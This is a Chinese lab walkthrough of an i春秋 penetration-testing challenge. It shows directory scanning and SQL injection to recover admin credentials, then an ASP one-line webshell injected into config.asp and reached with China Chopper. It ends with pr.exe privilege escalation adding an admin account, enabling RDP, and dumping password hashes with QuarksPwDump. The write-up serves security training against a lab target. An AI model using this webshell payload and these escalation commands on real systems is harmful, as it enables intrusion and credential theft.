01-在线挑战详细攻略-《我很简单,请不要欺负我》

本文来源:

01-在线挑战详细攻略-《我很简单,请不要欺负我》

系列文章:

02-在线挑战详细攻略-《网站综合渗透实验》

03-在线挑战详细攻略-《又见DZ,我能拿你怎么办》

04-在线挑战详细攻略-《2015中国网络安全大赛:Reinstall真题》

05-在线挑战详细攻略-《2015中国网络安全大赛:框架漏洞真题》


Setp 0

实验环境

实验地址:bbs.ichunqiu.com/thread-1783-1-1.html

操作机:Windows XP [172.16.11.2]

目标机:Windows server 2003 [172.16.12.2]

实验工具: 中国菜刀 Pr 御剑 Pangolin 3389

本实验要求获取www.test.ichunqiu网站的服务器权限。

ps:图片可单击放大观看。

Step 1

目录扫描

工具:御剑

路径:C:\Tools\目录扫描\

打开御剑,在域名中输入http://www.test.ichunqiu,开始扫描;

在目录列表中查找后台,发现存在/admin
双击打开后台登录页面http://www.test.ichunqiu/admin
不过用户名和密码都不知道,没关系,进行下一步:获取用户名和密码。

Step 2

工具:旁注WEB综合检测程序Ver3.6修正版

路径:C:\Tools\注入工具\Domain3.6\Domain3.6.exe

打开工具,依次点击 [SQL注入] -->[批量扫描注入点] --> [添加网址] --> [批量分析注入点];
点击OK进行下一步;

注入点分析完毕后,会在下方列表中显示可注入的地址,选择其中一个地址,右键选择 [检测注入];

点击 [检测注入] 后,主界面从 [批量扫描注入点] 转到 [SQL注入猜解检测],点击 [开始检测];
检测完毕后,显示可以注入,并列出了数据库类型:Access数据库;
下面开始逐步 [猜解表名] -->[猜解列名]--> [猜解内容];点击 [猜解表名] 后,在数据库列表中会显示4个表,分别是admin、user、movie和news;
选择admin表,点击 [猜解列名],成功猜解出三个列名id、username和password;
勾选username和password,点击 [猜解内容],右侧列表中成功显示用户名admin,密码469e80d32c0559f8

当然密码是MD5加密的,打开本机浏览器,输入http://www.cmd5.com,输入刚刚查询到的密文,点击 [解密];
成功找到明文密码:admin888;

注入的方法与工具很多,或者也可以这样:在浏览器中打开网站首页http://www.test.ichunqiu,在最新产品中随便选择一个打开 [注入点太多];

复制URL [www.test.ichunqiu/ProductShow.asp?ID=7],使用工具:穿山甲

工具:[穿山甲Pangolin]

路径: C:\Tools\注入工具\pangolin

Pangolin是一款帮助渗透测试人员进行Sql注入测试的安全工具。所谓的SQL注入测试就是通过利用目标网站的某个页面缺少对用户传递参数控制或者控制的不够好的情况下出现的漏洞,从而达到获取、修改、删除数据,甚至控制数据库服务器、Web服务器的目的的测试方法;

打开穿山甲,输入URL,点击绿色三角箭头进行注入操作;
点击 [Dates] 切换到Dates选项卡,点击 [Tables] 成功猜解出4张表;
获取内容的原理同Domain的使用方法一样,[猜解表名]-->[猜解列名]-->[猜解内容];

同样能获取用户名和密码;

下一步:登录后台,上传木马;

Setp 3

打开后台登录页面,输入用户名admin,密码admin888,输入验证码,点击 [ENTER] 登录后台;

久违的后台终于进去了….
点击左侧菜单栏中的 [系统设置管理]-->[网站信息配置],用修改配置文件的方法获取WebShell;
打开相应页面后,将 [公司名称] 内容修改为一句话木马"%><%Eval Request(Chr(35))%><%'

写一句话木马的时候注意闭合;

点击最下面的 [保存设置] 按钮;
如果插马成功,[公司名称] 内容为空;
打开 [中国菜刀] 连接一句话木马;

工具:中国菜刀    路径:C:\Tools\webshell\中国菜刀

打开菜刀,右键空白处,选择 [添加];

在地址栏中输入http://www.test.ichunqiu/inc/config.asp,为什么是这个路径?因为我们刚才修改的网站信息配置页面,就是这个路径,可以自己下载一个魅力企业网站管理系统源码看看,2007或2009版的都行,里面的目录结构一目了然;

连接密码为#,密码为什么是#? 往上看一句话木马,里面有个chr(35),#的ascii码就是35,当然这个密码可以随便设置,只要保证服务端一句话木马里的密码和添加SHELL时输入的密码一致即可,点击 [添加];

添加成功后会新增一条记录;
双击这个URL,成功进入!
解释一下一句话木马,/inc/config.asp的源码是这样的:

<code>

<%

Const SiteName="魅力企业网站管理系统 2007 中英繁商业正式版"        '网站名称

Const EnSiteName="MSCOM 2007"        '网站名称

Const SiteTitle="魅力软件"        '网站标题

Const EnSiteTitle="MelyySoft"        '网站标题

Const SiteUrl="www.melyysoft.com"        '网站地址

Const Miibeian="湘ICP备05011184号"        '网站备案号

….

%>

</code>

构造一句话木马:

<code>

"%><%Eval Request(Chr(35))%><%'

</code>

插入一句话木马后,config.asp代码会变成这样:

<code>

<%

Const SiteName=""%><%Eval Request(Chr(35))%><% '"        '网站名称

Const EnSiteName="MSCOM 2007"        '网站名称

Const SiteTitle="魅力软件"        '网站标题

Const EnSiteTitle="MelyySoft"        '网站标题

Const SiteUrl="www.melyysoft.com"        '网站地址

Const Miibeian="湘ICP备05011184号"        '网站备案号

….

%>

</code>

代码再整理规范一点就是这样:

<code>

<%Const SiteName=""%>

<%Eval Request(Chr(35))%>

<% '"        '网站名称

Const EnSiteName="MSCOM 2007"        '网站名称

Const SiteTitle="魅力软件"        '网站标题

Const EnSiteTitle="MelyySoft"        '网站标题

Const SiteUrl="www.melyysoft.com"        '网站地址

Const Miibeian="湘ICP备05011184号"        '网站备案号

….

%>

</code>

所以插入一句话木马一定要保证整个代码的语法是正确的,否则肯定不成功;

下一步,添加账户-->开启3389-->远程桌面连接-->获取管理员账户密码;


Step 4

进入C:\RECYCLER目录,准备上传提权工具;当然可写的目录不知这一个,还有其他的;

提权工具包括pr,3389,cmd,路径:C:\Tools\提权工具\windows
开始上传工具,选中这三个文件,用鼠标直接拖到中国菜刀中,即可完成上传;
上传成功;

Pr.exe提权

Windows跟踪注册表项的ACL权限提升漏洞  KB952004  MS09-012

Windows管理规范(WMI)提供程序没有正确地隔离NetworkService或LocalService帐号下运行的进程,同一帐号下运行的两个独立进程可以完全访问对方的文件句柄、注册表项等资源。WMI提供程序主机进程在某些情况下会持有SYSTEM令牌,如果攻击者可以以 NetworkService或LocalService帐号访问计算机,攻击者就可以执行代码探索SYSTEM令牌的WMI提供程序主机进程。一旦找到了SYSTEM令牌,就可以获得SYSTEM权限的提升。

使用方法:

<code>pr.exe "net user hacker 123 /add & net localgroup administrators hacker /add"</code>

net user hacker 123 /add

添加一个用户名为hacker、密码为123的账户;

net localgroup administrators hacker /add

将账户hacker添加到管理员组;

提权有很多种,如巴西烤肉Churrasco.exe等;

下一步,执行提权操作;

右键cmd.exe,选择 [虚拟终端]

成功进入,将目录切换到C:\RECYCLER
用pr.exe执行cmd命令,添加账户;

<code>pr "net user hacker 123 /add"</code>

第一次执行命令有可能不成功,怎么办?

没关系,再执行一次就OK了;
账户添加成功,下一步,将hacker账户添加到系统管理员组;

<code>pr "net localgroup administrators hacker /add"</code>

添加成功,下一步,开启3389;

pr 3389

如果找不见目标IP地址,请点击右上角 [场景拓扑图] 进行查看:
输入目标IP地址:172.16.12.2,开始连接,继续输入用户名hacker和密码123,进入系统;
3389连接成功!下一步,获取系统管理员密码,准确的说是获取系统管理员密码的hash,上传密码获取工具 ,还是使用菜刀上传;
工具一大堆,随便用,这里我们使用QuarksPwDum,开始上传;
上传成功,进入目标机,运行QuarksPwDump。:打开cmd,用命令行启动QuarksPwDump,不要直接双击;
运行后,会出现如下界面:

继续输入命令:QuarksPwDump --dump-hash-local
执行后的结果如下:

成功获取到administrator的hash:62C4700EBB05958F3832C92FC614B7D1:4D478675344541AACCF6CF33E1DD9D85

暂时切换出实验环境,在你的电脑上打开浏览器输入http://www.objectif-securite.ch/en/ophcrack.php,在页面的相应位置输入hash,然后GO;

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 201,468评论 5 473
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 84,620评论 2 377
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 148,427评论 0 334
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,160评论 1 272
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,197评论 5 363
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,334评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,775评论 3 393
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,444评论 0 256
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,628评论 1 295
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,459评论 2 317
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,508评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,210评论 3 318
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,767评论 3 303
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,850评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,076评论 1 258
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 42,627评论 2 348
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,196评论 2 341

推荐阅读更多精彩内容